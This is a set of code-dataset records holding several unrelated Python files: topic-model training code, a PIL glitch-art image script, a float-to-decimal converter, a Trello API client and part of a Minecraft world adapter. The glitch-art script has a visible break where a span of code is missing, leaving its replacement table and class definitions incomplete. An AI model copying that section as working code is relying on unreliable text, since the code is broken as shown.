self.backgroundWords[wi] + self.topicWords[wi, k])/sZ[k]\n topicScores[k] = np.exp(self.kappa * np_Q[doc_id,b, k]\n + self.backgroundWords[wi] + self.topicWords[wi, k])\n\n topicScores = topicScores / np.sum(topicScores)\n # sampling Z_wp\n if sample:\n mul_drawn = np.random.multinomial(1, topicScores)\n else:\n mul_drawn = np.zeros_like(topicScores)\n mul_drawn[np.argmax(topicScores)] = 1\n\n # countTopic += mul_drawn\n newTopic = np.where(mul_drawn == 1)[0][0]\n if newTopic != topics[wp]:\n t = topics[wp]\n self.wordTopicCounts[wi, t] -= 1\n self.wordTopicCounts[wi, newTopic] += 1\n self.topicCounts[t] -= 1\n self.topicCounts[newTopic] += 1\n topics[wp] = newTopic\n\n\n def train(self):\n print('***Init all variables ...')\n # self.initFunc()\n\n print('***Start training ...')\n # stop_tensor = Variable(torch.LongTensor(stopword), requires_grad=False)\n\n for epoch_i in trange(self.config.n_epoch, desc='Epoch', ncols=80):\n # total_loss = []\n # kl_list = []\n # nllk_list = []\n # total_loss_value = []\n # entropy_loss_list = []\n # entropy_topic_list = []\n # self._zero_grads()\n\n # _maxiter_ = 1\n # for _ in range(_maxiter_):\n # self.sample_Z()\n # # for _ in range(_maxiter_):\n # for batch_i, doc_features in enumerate(tqdm(\n # self.train_loader, desc='Batch-TM', ncols=80, leave=False)):\n #\n # _x, _y, corpus_id = 
doc_features\n # corpus_id = corpus_id.numpy()[0]\n # var_x_ = Variable(_x,requires_grad=False)\n # var_y = Variable(_y,requires_grad=False)\n # # [s_len x w_len]\n # var_x = torch.squeeze(var_x_,0)\n # emb_x = self.embedding(var_x).transpose_(0,1)\n # sen_x_ = self.rnn_w(emb_x)[-1,:,:]\n # sen_x = torch.unsqueeze(sen_x_, 1)\n # # [len x batch x nTopic]\n # zQ, _ = self.vrnn(self.prob_q, self.prob_p, sen_x, self.config,\n # self.Q_mu, self.Q_var, self.P_mu, self.P_var)\n #\n # # calculate all losses\n # # kl_loss = self.config.kl_reg*self.KLDist2DistBuck(Q,P)\n #\n # # kl_loss = torch.sum(kl_seq)\n # # kl_list.append(kl_loss.data.numpy())\n #\n # # llk = self.logLK(var_x,Q,stop_tensor)\n # # entro_loss = self.config.entropy_reg*self.entropy_loss(P,Q)\n # # entro_topic = self.entropy_topic()\n #\n # # Sampling Z\n # # Q = nn.Softmax(dim=-1)(zQ*self.kappa)\n # np_Q = zQ.data.numpy()\n # np_Q = np.squeeze(np_Q,1)\n # cor_x = _x.squeeze_(0).numpy()\n # countTopicList = []\n #\n # for doc_id, doc_x in enumerate(cor_x):\n # topics = self.wordTopics[corpus_id][doc_id]\n # countTopic = np.zeros(self.config.topic_size)\n # # for wp, wi in enumerate(doc_x[doc_x!=0]):\n # doc_x_clean = [w for w in doc_x if w not in self.stopword]\n # for wp, wi_0 in enumerate(doc_x_clean):\n # wi = wi_0-1\n # topicScores = np.zeros(self.config.topic_size)\n # for k in range(self.config.topic_size):\n # topicScores[k] = np.exp(self.kappa * np_Q[doc_id,k]\n # + self.backgroundWords[wi] + self.topicWords[wi,k])\n #\n # topicScores = topicScores/np.sum(topicScores)\n # # sampling Z_wp\n # mul_drawn = np.random.multinomial(1,topicScores)\n # # countTopic += mul_drawn\n # newTopic = np.where(mul_drawn==1)[0][0]\n # if newTopic != topics[wp]:\n # t = topics[wp]\n # self.wordTopicCounts[wi,t]-=1\n # self.wordTopicCounts[wi,newTopic]+=1\n # self.topicCounts[t]-=1\n # self.topicCounts[newTopic] +=1\n # topics[wp] = newTopic\n # concat all topics-count\n # countTopicList.append(countTopic)\n\n # countTopicList = Variable(torch.FloatTensor(np.expand_dims(np.stack(countTopicList),1)), requires_grad=False)\n # pQ = torch.log(Q)\n # llk = torch.sum(torch.sum(countTopicList*pQ, -1))\n # batch_loss = -llk + kl_loss\n # total_loss.append(batch_loss)\n # total_loss_value.append(batch_loss.data.numpy())\n # nllk_list.append(-llk.data.numpy())\n\n print('\\n- Topic:')\n self.dLSTM.expose_topic(self.topicemb, self.embedding)\n total_loss_value, nllk_list, kl_list, sp_list = self.train_rnn(maxiter=1)\n\n\n # Update LDA-part by quasi-newton\n # newTopicWords, fvalue, _ = scipy.optimize.fmin_l_bfgs_b(func=self.fn,x0=self.topicWords.flatten(),maxiter=5)\n # self.topicWords = np.reshape(newTopicWords, self.topicWords.shape)\n # self.normalizeTopicWords()\n\n # Backprop NN\n\n # for _loss in total_loss:\n # (sum(total_loss)/len(total_loss)).backward(retain_graph=True)\n # (sum(total_loss)).backward(retain_graph=True)\n # _loss.backward(retain_graph=True)\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.config.clip)\n # self.optimizer.step()\n\n # Save parameters at checkpoint\n if (epoch_i + 1) % self.config.eval_rate == 0:\n self.evaluate(epoch_i + 1)\n if self.config.write_model:\n # save model\n self.save_checkpoint({\n 'epoch': epoch_i + 1,\n 'state_dict': self.model.state_dict(),\n 'total_loss': np.mean(total_loss_value),\n 'optimizer': [self.optimizer.state_dict()],\n 'topic_emb': self.topicemb\n }, filename='./model/chk_point_{}.pth'.format(epoch_i + 1))\n # self.save_checkpoint(self.topicemb, 
filename='./model/chk_point_topic_{}.pth'.format(epoch_i + 1))\n\n tqdm.write('\\n***Ep-{} | Total_loss: {} | KL: {} | NLLK: {} | Sparsity: {} | NORM: {}'.format(\n epoch_i,np.mean(total_loss_value),np.mean(kl_list),np.mean(nllk_list), np.mean(sp_list),\n self.get_norm_grad(self.model).data\n ))\n\n self.writer.update_parameters(self.model, epoch_i)\n self.writer.update_loss(np.sum(total_loss_value), epoch_i, 'total_loss')\n self.writer.update_loss(np.sum(kl_list), epoch_i, 'kl_loss')\n self.writer.update_loss(np.sum(nllk_list), epoch_i, 'nllk')\n # self.writer.update_loss(fvalue, epoch_i, 'Fn')\n\n\n def evaluate(self, epoch_i):\n def myplot(distr_list, words):\n labels = list(words)\n xs = range(len(labels))\n def format_fn(tick_val, tick_pos):\n if int(tick_val) in xs:\n return labels[int(tick_val)]\n else:\n return ''\n fig, axs = plt.subplots(len(distr_list), 1, sharey=True, figsize=(50,100))\n\n for i in range(len(distr_list)):\n axs[i].xaxis.set_major_formatter(FuncFormatter(format_fn))\n axs[i].xaxis.set_major_locator(MaxNLocator(nbins=50,integer=True))\n # axs[i].xaxis.set_xticks()\n values = list(distr_list[i])\n # axs[0].bar(names, values)\n # axs[1].scatter(names, values)\n axs[i].plot(xs, values)\n fig.suptitle('Categorical Plotting')\n fig.savefig('./Result/fullads/distr-viz-ep{}.eps'.format(epoch_i),format='eps', dpi=1000)\n\n self.model.eval()\n f_vocab = './output/vocab.dat'\n f_out = open('./Result/fullads/distr-view-ep{}.dat'.format(epoch_i), 'w')\n bg_out = open('./Result/fullads/bg-view-ep{}.dat'.format(epoch_i), 'w')\n rev_vocab = dict()\n vocab = []\n with open(f_vocab,'r') as f:\n for line in f:\n wi = line.split('\\t')\n rev_vocab[int(wi[1])]= wi[0]\n vocab.append(wi[0])\n bg_out.write('{}\\t{}\\n'.format(self.backgroundWords[int(wi[1])-1],wi[0]))\n\n bg_out.close()\n w_distr = np.exp(self.topicWords)/np.sum(np.exp(self.topicWords),axis=0)\n nv = w_distr.shape[0]\n nt = w_distr.shape[1]\n\n # plot\n myplot(list(w_distr[:500,:].transpose()), vocab[:500])\n\n for t in range(nt):\n _, sortedvb = zip(*sorted(zip(w_distr[:,t], vocab), reverse=True))\n sortedvb = list(sortedvb)\n newline = ''\n for w in sortedvb:\n newline = newline + '\\t' + w\n f_out.write(newline.strip() + '\\n')\n\n f_out.close()\n self.model.train()\n\n np.savetxt('./Result/fullads/beta-view-ep{}.dat'.format(epoch_i), self.topicWords, delimiter='\\t')\n # np.savetxt('./output/bg-view-ep{}.dat'.format(epoch_i), self.backgroundWords, delimiter='\\t')\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"rnnTM_main.py","file_name":"rnnTM_main.py","file_ext":"py","file_size_in_byte":28126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"419540595","text":"import os\nfrom random import randint\nimport time\nimport random\nimport math\nimport numpy\nimport colorsys\nimport sys\nfrom PIL import Image, ImageOps, ImageChops\nimport logging\nfrom subprocess import call\nimport functools\nimport itertools\nimport os.path\nimport re\nimport StringIO\n\nINPUT_DIR=\"/home/stephen.salmon/art/inputimages/\"\nOUTPUT_DIR=\"/home/stephen.salmon/art/outputimages/\"\n\n\"\"\"\nThe wordpad glitch is a tuple of 2tuples containing\na match and a replacement\n\"\"\"\nWORDPAD_GLITCH = [\n (b'\\x07', b'\\x20'),\n (b'\\x0B',b'\\x0A\\x0D'),\n (b'(? 
max_oc:\n (max_oc, most_pres) = c\n return most_pres\n except TypeError:\n raise Exception(\"too many colors in the image\")\n \n def get_avg_rgb_per_square(self):\n for coords in self.square_coords:\n avg_rgb = self.get_avg_rgb_color(self.input_img.crop(coords))\n self.avg_rgb_per_square.append(avg_rgb)\n \n def convert_rgb_to_hsv(self, rgb):\n hsv = colorsys.rgb_to_hsv(*rgb)\n return hsv\n \n def get_avg_hsv_per_square(self):\n for rgb_col in self.avg_rgb_per_square:\n avg_hsv= self.convert_rgb_to_hsv(rgb_col)\n self.avg_hsv_per_square.append(avg_hsv)\n \n def convert_rgb_to_lum(self, r,g,b):\n return math.sqrt( .241 * r + .691 * g + .068 * b )\n \n def get_avg_lum_per_square(self):\n for rgb_col in self.avg_rgb_per_square:\n avg_lum = self.convert_rgb_to_lum(*rgb_col)\n self.avg_lum_per_square.append(avg_lum)\n \n def convert_to_step(self,r,g,b, repetitions=1):\n\n lum = math.sqrt( .241 * r + .691 * g + .068 * b )\n h, s, v = colorsys.rgb_to_hsv(r,g,b)\n h2 = int(h * repetitions)\n lum2 = int(lum * repetitions)\n v2 = int(v * repetitions)\n return (h2, lum2, v2)\n \n def get_avg_step_per_square(self, repetitions = 1):\n for rgb_col in self.avg_rgb_per_square:\n avg_step = self.convert_to_step(*rgb_col, repetitions=repetitions)\n self.avg_step_per_square.append(avg_step)\n \n \n def square_sort_image(self, square_size=10, sort_type=\"avg_rgb_per_square\"\n , saved=False, invert=False):\n sq_size = square_size\n self.get_square_coordinates(square_size=sq_size)\n self.get_avg_rgb_per_square() # always need todo this\n \n orig_seq = range(self.total_squares)\n sorting_seq = []\n \n sorted_image = self.input_img.copy()\n \n if sort_type == \"avg_rgb\" :\n myzip = zip(self.avg_rgb_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n elif sort_type == \"avg_hsv\":\n self.get_avg_hsv_per_square()\n myzip = zip(self.avg_hsv_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n elif sort_type == \"avg_lum\":\n self.get_avg_lum_per_square()\n myzip = zip(self.avg_lum_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n elif sort_type == \"avg_step\":\n self.get_avg_step_per_square()\n myzip = zip(self.avg_step_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n \n sequence_iter = iter(orig_seq)\n \n for num in sorting_seq:\n if num % 2 == 0 and invert == True:\n im = ImageChops.invert(self.input_img.crop(self.square_coords[num]))\n sorted_image_coords=self.square_coords[(sequence_iter.next())]\n else:\n im = self.input_img.crop(self.square_coords[num])\n sorted_image_coords=self.square_coords[(sequence_iter.next())]\n\n sorted_image.paste(im, sorted_image_coords)\n \n return sorted_image\n \n def slice_overlay(self, sorted_splice):\n for coord in range(0, len(self.square_coords), 2):\n im2 = self.input_img.crop(self.square_coords[coord])\n sorted_splice.paste(im2, self.square_coords[coord])\n for coord in range(0, len(self.square_coords), 3):\n im2 = self.input_img.crop(self.square_coords[coord])\n sorted_splice.paste(im2, self.square_coords[coord])\n\n return sorted_splice\n \n def rand_overlay(self, input_img, no_of_rand_squares=2000):\n while no_of_rand_squares > 0:\n rand_coord = random.choice(self.square_coords)\n # print(\"rand coord is\" + str(rand_coord))\n img = self.input_img.crop(rand_coord)\n input_img.paste(img, rand_coord)\n no_of_rand_squares -= 1\n \n return input_img\n \n def stretch(self, input_img, percentage=10, dim=\"height\"):\n '''Function to stretch an 
image by a percentage'''\n \n # use float division so small integer percentages still stretch the image\n p = 1 + ( percentage / 100.0 )\n \n # PIL's size attribute is (width, height)\n width, height = input_img.size\n if dim == \"height\":\n input_img = input_img.resize((width, int(height*p)), 3)\n elif dim == \"width\":\n input_img = input_img.resize((int(width*p), height), 3)\n \n return input_img\n \n def tile(self, input_img, chop=False):\n '''Method to tile and chop a wordpad glitch'''\n \n # create an image 4 times the size of the input image\n # crop out the centre of the image\n \n width, height = input_img.size\n tiled_image = Image.new(\"RGB\", (width*2, height*2), \"white\")\n \n topleft = (0,0,width,height)\n topright = (width,0,width*2, height)\n bottomleft = (0,height,width,height*2)\n bottomright = (width, height, width*2, height*2)\n\n tiled_image.paste(input_img.copy(),topleft)\n tiled_image.paste(input_img.copy(),topright)\n tiled_image.paste(input_img.copy(),bottomleft)\n tiled_image.paste(input_img.copy(),bottomright)\n \n crop_centre_coords = (int(width/2),int(height/2),int(width*1.5),int(height*1.5))\n \n if chop == True:\n tiled_image = tiled_image.crop(crop_centre_coords)\n \n return tiled_image\n \n def save_me(self, format=\"tif\"):\n pass\n \n##########################################################################\n## Justins Functions\ndef file_read(path, options='rb'):\n with open(path, options) as rh:\n return rh.read()\n \ndef file_write(path, content, options='wb'):\n with open(path, options) as wh:\n wh.write(content)\n \ndef str_io(content=''):\n io = StringIO.StringIO(content)\n io.seek(0)\n return io\n\ndef convert(fh, format='jpeg'):\n img = Image.open(fh)\n wh = str_io()\n img.save(wh, format=format)\n wh.seek(0)\n return wh\n\ndef replace(img, replacements=()): \n ''' Do any kind of replacement, experiment with patterns\n '''\n for pattern, replacement in replacements:\n img = pattern.sub(replacement, img)\n return img \n\nwordpad_replacer = functools.partial(replace, replacements=_WORDPAD_GLITCH) \n\ndef wordpad(infile, outfile):\n image = convert(str_io(file_read(infile)), 'bmp')\n # need to parse the header from the bmp file\n header = image.read(16 + 24)\n # perform the glitch\n glitched = str_io(header + wordpad_replacer(image.read()))\n # convert the image to a jpeg\n output = convert(glitched, 'jpeg')\n file_write(outfile, output.read())\n\n############################################################################\n \nif __name__ == '__main__':\n input_image_name=\"too.jpg\"\n image_path = os.path.join(INPUT_DIR, input_image_name)\n g_img = glitchChops(Image.open(image_path))\n stretched_img = g_img.tile(g_img.input_img)\n stretched_img.show()\n stretched_img.save(OUTPUT_DIR+\"tile_stretch.jpg\")\n #g_img.get_strip_coordinates()\n #sorted_img = g_img.square_sort_image(square_size=20, saved=True, sort_type=\"avg_rgb\")\n #sorted_img.show()\n# slice_over = g_img.slice_overlay(sorted_img)\n# img2 = g_img.rand_overlay(slice_over)\n# img2.show()\n# img2.save(OUTPUT_DIR+\"testsave.tif\")\n# g_img2 = glitchChops(Image.open(OUTPUT_DIR+\"testsave.tif\"))\n# sorted_img = g_img2.square_sort_image(square_size=20, saved=True, sort_type=\"avg_step\")\n# sorted_img.show()\n \n \n# Create a function to save.. 
use justins read + write methods\n \n# if saved==True:\n# input_fn = os.path.basename(self.input_file_path)\n# fn = input_fn + time.strftime(\"%Y%m%d-%H%M%s\") + \".tif\"\n# output_fn = os.path.join(OUTPUT_DIR,fn)\n# sorted_image.save(output_fn)\n# self.last_saved_path = output_fn\n \n\n ","sub_path":"laptop_backup/liclipse python images stuff/imagestuff/GlitchChops/glitch_chops.py","file_name":"glitch_chops.py","file_ext":"py","file_size_in_byte":13623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"409784173","text":"def get_input():\n a_input = input(\"Ingresa el número: \")\n return a_input\n\n\ndef bin_to_base(bit_string, base):\n res = 0\n bit_string = bit_string[::-1]\n for pos in range(len(bit_string)):\n res += int(bit_string[pos]) * (base ** pos)\n return res\n\n\ndef det_first_term(input_bits):\n sign = input_bits[0]\n first_term = (-1) ** int(sign)\n return first_term\n\n\ndef det_second_term(input_bits):\n epsilon = 127\n exponent = bin_to_base(input_bits[1:9], 2)\n second_term = 2 ** (exponent - epsilon)\n return second_term\n\n\ndef det_third_term(input_bits):\n third_term = 0\n mantissa = \"1\" + input_bits[9:]\n for num in range(len(mantissa)):\n third_term += int(mantissa[num]) / (2 ** num)\n return third_term\n\n\ndef to_decimal():\n input_num = get_input()\n dec_first_term = det_first_term(input_num)\n dec_second_term = det_second_term(input_num)\n dec_third_term = det_third_term(input_num)\n dec_number = dec_first_term * dec_second_term * dec_third_term\n return dec_number\n","sub_path":"Floating_Point/fp_to_dec.py","file_name":"fp_to_dec.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"219783884","text":"import os \nimport requests, datetime, json\n\nclass TrelloCard:\n def __init__(self, id, name, idList, due_date, description, modified):\n self.id = id\n self.name = name\n self.idList = idList\n self.due_date = due_date\n self.description = description\n self.modified = modified\n \n def get_date(self):\n return datetime.datetime.strftime(self.due_date, '%Y-%m-%d')\n \n def get_user_date(self):\n return datetime.datetime.strftime(self.due_date, '%d/%m/%Y')\n\n def get_modified_date(self):\n return datetime.datetime.strftime(self.modified, '%Y-%m-%d')\n \n def get_modified_user_date(self):\n return datetime.datetime.strftime(self.modified, '%d/%m/%Y')\n\nclass ViewModel:\n def __init__(self, items, lists):\n self._items = items\n self._lists = lists\n\n @property\n def items(self):\n return self._items\n\n @property\n def lists(self):\n return self._lists\n\n @property\n def items_todo(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['ToDo']:\n items.append(item)\n return items\n\n @property\n def items_inprogress(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['InProgress']:\n items.append(item)\n return items\n\n @property\n def items_completed(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['Completed']:\n items.append(item)\n return items\n\n @property\n def recent_completed_items(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['Completed'] and item.modified == datetime.date.today():\n items.append(item)\n return items\n\n @property\n def older_completed_items(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['Completed'] and item.modified != 
datetime.date.today():\n items.append(item)\n return items\n\ndef get_trello_credentials():\n auth_cred = []\n auth_cred.append(os.getenv('TRELLO_API_KEY'))\n auth_cred.append(os.getenv('TRELLO_API_TOKEN'))\n\n return auth_cred\n\ndef get_trello_board_id():\n board_id = os.getenv('TRELLO_API_BOARD_ID')\n return board_id\n\ndef get_trello_lists_on_board():\n trello_auth_cred = get_trello_credentials()\n trello_board_id = get_trello_board_id()\n getalllistsparams = {'key': trello_auth_cred[0], 'token': trello_auth_cred[1]}\n response = requests.get(f'https://api.trello.com/1/boards/{trello_board_id}/lists', params=getalllistsparams)\n all_lists = response.json()\n\n return all_lists\n\n\ndef get_trello_list_id(list_name):\n trello_auth_cred = get_trello_credentials()\n trello_board_id = get_trello_board_id()\n response = requests.get(f'https://api.trello.com/1/boards/{trello_board_id}/lists?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n \n all_lists = response.json()\n\n for i in all_lists:\n if i['name'] == list_name:\n list_id = i['id']\n \n return list_id\n\ndef get_trello_cards():\n trello_auth_cred = get_trello_credentials()\n trello_board_id = get_trello_board_id()\n response = requests.get(f'https://api.trello.com/1/boards/{trello_board_id}/cards?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n \n card_list = []\n for card in response.json():\n if card['due'] == None:\n due_date = datetime.datetime.strftime(datetime.datetime.today() + datetime.timedelta(365), '%Y-%m-%dT%H:%M:%S.%fZ')\n\n else:\n due_date = card['due']\n\n card_list.append(TrelloCard(card['id'], card['name'], card['idList'], datetime.datetime.strptime(due_date, '%Y-%m-%dT%H:%M:%S.%fZ'), card['desc'], datetime.datetime.strptime(card['dateLastActivity'], '%Y-%m-%dT%H:%M:%S.%fZ').date()))\n \n return card_list\n\ndef get_trello_card_list(listid):\n trello_auth_cred = get_trello_credentials()\n lists = get_trello_lists_on_board()\n for _list in lists:\n if _list['id'] == listid:\n required_list_id = _list['id']\n response = requests.get(f'https://api.trello.com/1/lists/{required_list_id}/cards?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n\n card_list = []\n for card in response.json():\n # TrelloCard requires due_date, description and modified as well;\n # parse them the same way get_trello_cards does (the original call\n # passed only three arguments and would raise a TypeError).\n if card['due'] == None:\n due_date = datetime.datetime.strftime(datetime.datetime.today() + datetime.timedelta(365), '%Y-%m-%dT%H:%M:%S.%fZ')\n else:\n due_date = card['due']\n existing_card = TrelloCard(card['id'], card['name'], card['idList'], datetime.datetime.strptime(due_date, '%Y-%m-%dT%H:%M:%S.%fZ'), card['desc'], datetime.datetime.strptime(card['dateLastActivity'], '%Y-%m-%dT%H:%M:%S.%fZ').date())\n\n card_list.append(existing_card)\n\n return card_list\n\ndef move_trello_card(card_id, new_list_id):\n trello_auth_cred = get_trello_credentials()\n requests.put(f'https://api.trello.com/1/cards/{card_id}?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&idList={new_list_id}')\n\ndef create_trello_card(new_card):\n trello_auth_cred = get_trello_credentials()\n trello_list_id = get_trello_list_id(\"To Do\")\n requests.post(f'https://api.trello.com/1/cards/?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&idList={new_card.idList}&name={new_card.name}&desc={new_card.description}&due={new_card.get_date()}')\n\n\ndef delete_trello_card(card_id):\n trello_auth_cred = get_trello_credentials()\n requests.delete(f'https://api.trello.com/1/cards/{card_id}?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&closed=true')\n\ndef create_trello_board(board_name):\n trello_auth_cred = get_trello_credentials()\n response = requests.post(f'https://api.trello.com/1/boards/?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&name={board_name}')\n new_board = response.json()\n return new_board['id']\n\ndef delete_trello_board(board_id):\n trello_auth_cred = get_trello_credentials()\n 
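    # Trello's REST API authenticates purely through the key/token pair in the
    # query string, so this DELETE needs no extra headers; it is the natural
    # counterpart to create_trello_board above for throwaway test boards.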
requests.delete(f'https://api.trello.com/1/boards/{board_id}/?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n \n \n\n","sub_path":"todo_app/data/trello_items.py","file_name":"trello_items.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"174951615","text":"from micropsi_core.world.worldadapter import WorldAdapter\nfrom micropsi_core import tools\nimport random\nimport logging\nimport time\nfrom functools import partial\nfrom math import sqrt, radians, cos, sin\nfrom spock.mcp.mcpacket import Packet\n\n\nclass MinecraftGraphLocomotion(WorldAdapter):\n\n supported_datasources = [\n 'fov_x', # fovea sensors receive their input from the fovea actors\n 'fov_y',\n 'fov_hist__-01', # these names must be the most commonly observed block types\n 'fov_hist__000',\n 'fov_hist__001',\n 'fov_hist__002',\n 'fov_hist__003',\n 'fov_hist__004',\n 'fov_hist__009',\n 'fov_hist__012',\n 'fov_hist__017',\n 'fov_hist__018',\n 'fov_hist__020',\n 'fov_hist__026',\n 'fov_hist__031',\n 'fov_hist__064',\n 'fov_hist__106',\n 'health',\n 'food',\n 'temperature',\n 'food_supply',\n 'fatigue',\n 'hack_situation',\n 'hack_decay_factor'\n ]\n\n supported_datatargets = [\n 'orientation',\n 'take_exit_one',\n 'take_exit_two',\n 'take_exit_three',\n 'fov_x',\n 'fov_y',\n 'eat',\n 'sleep'\n ]\n\n loco_node_template = {\n 'uid': \"\",\n 'name': \"\",\n 'x': 0,\n 'y': 0,\n 'z': 0,\n 'exit_one_uid': None,\n 'exit_two_uid': None,\n 'exit_three_uid': None,\n }\n\n loco_nodes = {}\n\n home_uid = tools.generate_uid()\n underground_garden_uid = tools.generate_uid()\n village_uid = tools.generate_uid()\n cathedral_uid = tools.generate_uid()\n summit_uid = tools.generate_uid()\n cloud_uid = tools.generate_uid()\n bungalow_uid = tools.generate_uid()\n farm_uid = tools.generate_uid()\n forest_uid = tools.generate_uid()\n desert_outpost_uid = tools.generate_uid()\n swamp_uid = tools.generate_uid()\n\n loco_nodes_indexes = [None, 'home', 'underground garden', 'village', 'cathedral', 'summit', 'cloud', 'bungalow', 'farm', 'forest', 'desert outpost', 'swamp']\n\n loco_nodes[home_uid] = loco_node_template.copy()\n loco_nodes[home_uid]['name'] = \"home\"\n loco_nodes[home_uid]['uid'] = home_uid\n loco_nodes[home_uid]['x'] = -105\n loco_nodes[home_uid]['y'] = 63\n loco_nodes[home_uid]['z'] = 59\n loco_nodes[home_uid]['exit_one_uid'] = cloud_uid\n loco_nodes[home_uid]['exit_two_uid'] = cathedral_uid\n loco_nodes[home_uid]['exit_three_uid'] = village_uid\n\n loco_nodes[underground_garden_uid] = loco_node_template.copy()\n loco_nodes[underground_garden_uid]['name'] = \"underground garden\"\n loco_nodes[underground_garden_uid]['uid'] = underground_garden_uid\n loco_nodes[underground_garden_uid]['x'] = -264\n loco_nodes[underground_garden_uid]['y'] = 62\n loco_nodes[underground_garden_uid]['z'] = 65\n loco_nodes[underground_garden_uid]['exit_one_uid'] = home_uid\n loco_nodes[underground_garden_uid]['exit_two_uid'] = village_uid\n\n loco_nodes[village_uid] = loco_node_template.copy()\n loco_nodes[village_uid]['name'] = \"village\"\n loco_nodes[village_uid]['uid'] = village_uid\n loco_nodes[village_uid]['x'] = -293\n loco_nodes[village_uid]['y'] = 64\n loco_nodes[village_uid]['z'] = -220\n loco_nodes[village_uid]['exit_one_uid'] = underground_garden_uid\n loco_nodes[village_uid]['exit_two_uid'] = home_uid\n\n loco_nodes[cathedral_uid] = loco_node_template.copy()\n loco_nodes[cathedral_uid]['name'] = \"cathedral\"\n 
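    # Each node above and below is a copy of loco_node_template keyed by a
    # pre-generated uid; the exit_*_uid fields are one-way references, so the
    # walkable graph only emerges once every referenced uid is itself defined.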
loco_nodes[cathedral_uid]['uid'] = cathedral_uid\n loco_nodes[cathedral_uid]['x'] = -100\n loco_nodes[cathedral_uid]['y'] = 63\n loco_nodes[cathedral_uid]['z'] = 282\n loco_nodes[cathedral_uid]['exit_one_uid'] = home_uid\n loco_nodes[cathedral_uid]['exit_two_uid'] = cloud_uid\n loco_nodes[cathedral_uid]['exit_three_uid'] = bungalow_uid\n\n loco_nodes[summit_uid] = loco_node_template.copy()\n loco_nodes[summit_uid]['name'] = \"summit\"\n loco_nodes[summit_uid]['uid'] = summit_uid\n loco_nodes[summit_uid]['x'] = -233\n loco_nodes[summit_uid]['y'] = 102\n loco_nodes[summit_uid]['z'] = 307\n loco_nodes[summit_uid]['exit_one_uid'] = swamp_uid\n\n loco_nodes[cloud_uid] = loco_node_template.copy()\n loco_nodes[cloud_uid]['name'] = \"cloud\"\n loco_nodes[cloud_uid]['uid'] = cloud_uid\n loco_nodes[cloud_uid]['x'] = -98\n loco_nodes[cloud_uid]['y'] = 63\n loco_nodes[cloud_uid]['z'] = 198\n loco_nodes[cloud_uid]['exit_one_uid'] = home_uid\n loco_nodes[cloud_uid]['exit_two_uid'] = cathedral_uid\n\n loco_nodes[bungalow_uid] = loco_node_template.copy()\n loco_nodes[bungalow_uid]['name'] = \"bungalow\"\n loco_nodes[bungalow_uid]['uid'] = bungalow_uid\n loco_nodes[bungalow_uid]['x'] = 28\n loco_nodes[bungalow_uid]['y'] = 63\n loco_nodes[bungalow_uid]['z'] = 292\n loco_nodes[bungalow_uid]['exit_one_uid'] = cathedral_uid\n loco_nodes[bungalow_uid]['exit_two_uid'] = farm_uid\n\n loco_nodes[farm_uid] = loco_node_template.copy()\n loco_nodes[farm_uid]['name'] = \"farm\"\n loco_nodes[farm_uid]['uid'] = farm_uid\n loco_nodes[farm_uid]['x'] = -50\n loco_nodes[farm_uid]['y'] = 64\n loco_nodes[farm_uid]['z'] = 410\n loco_nodes[farm_uid]['exit_one_uid'] = bungalow_uid\n loco_nodes[farm_uid]['exit_two_uid'] = cathedral_uid\n loco_nodes[farm_uid]['exit_three_uid'] = forest_uid\n\n loco_nodes[forest_uid] = loco_node_template.copy()\n loco_nodes[forest_uid]['name'] = \"forest\"\n loco_nodes[forest_uid]['uid'] = forest_uid\n loco_nodes[forest_uid]['x'] = -273\n loco_nodes[forest_uid]['y'] = 65\n loco_nodes[forest_uid]['z'] = 782\n loco_nodes[forest_uid]['exit_one_uid'] = farm_uid\n loco_nodes[forest_uid]['exit_two_uid'] = desert_outpost_uid\n loco_nodes[forest_uid]['exit_three_uid'] = swamp_uid\n\n loco_nodes[desert_outpost_uid] = loco_node_template.copy()\n loco_nodes[desert_outpost_uid]['name'] = \"desert outpost\"\n loco_nodes[desert_outpost_uid]['uid'] = desert_outpost_uid\n loco_nodes[desert_outpost_uid]['x'] = -243\n loco_nodes[desert_outpost_uid]['y'] = 64\n loco_nodes[desert_outpost_uid]['z'] = 958\n loco_nodes[desert_outpost_uid]['exit_one_uid'] = forest_uid\n\n loco_nodes[swamp_uid] = loco_node_template.copy()\n loco_nodes[swamp_uid]['name'] = \"swamp\"\n loco_nodes[swamp_uid]['uid'] = swamp_uid\n loco_nodes[swamp_uid]['x'] = -529\n loco_nodes[swamp_uid]['y'] = 63\n loco_nodes[swamp_uid]['z'] = 504\n loco_nodes[swamp_uid]['exit_one_uid'] = forest_uid\n loco_nodes[swamp_uid]['exit_two_uid'] = summit_uid\n\n tp_tolerance = 5\n\n action_timeout = 10\n\n logger = None\n\n # specs for vision /fovea\n # focal length larger 0 means zoom in, smaller 0 means zoom out\n # ( small values of focal length distort the image if things are close )\n # image proportions define the part of the world that can be viewed\n # patch dimensions define the size of the sampled patch that's stored to file\n focal_length = 0.5 # distance of image plane from projective point /fovea\n max_dist = 64 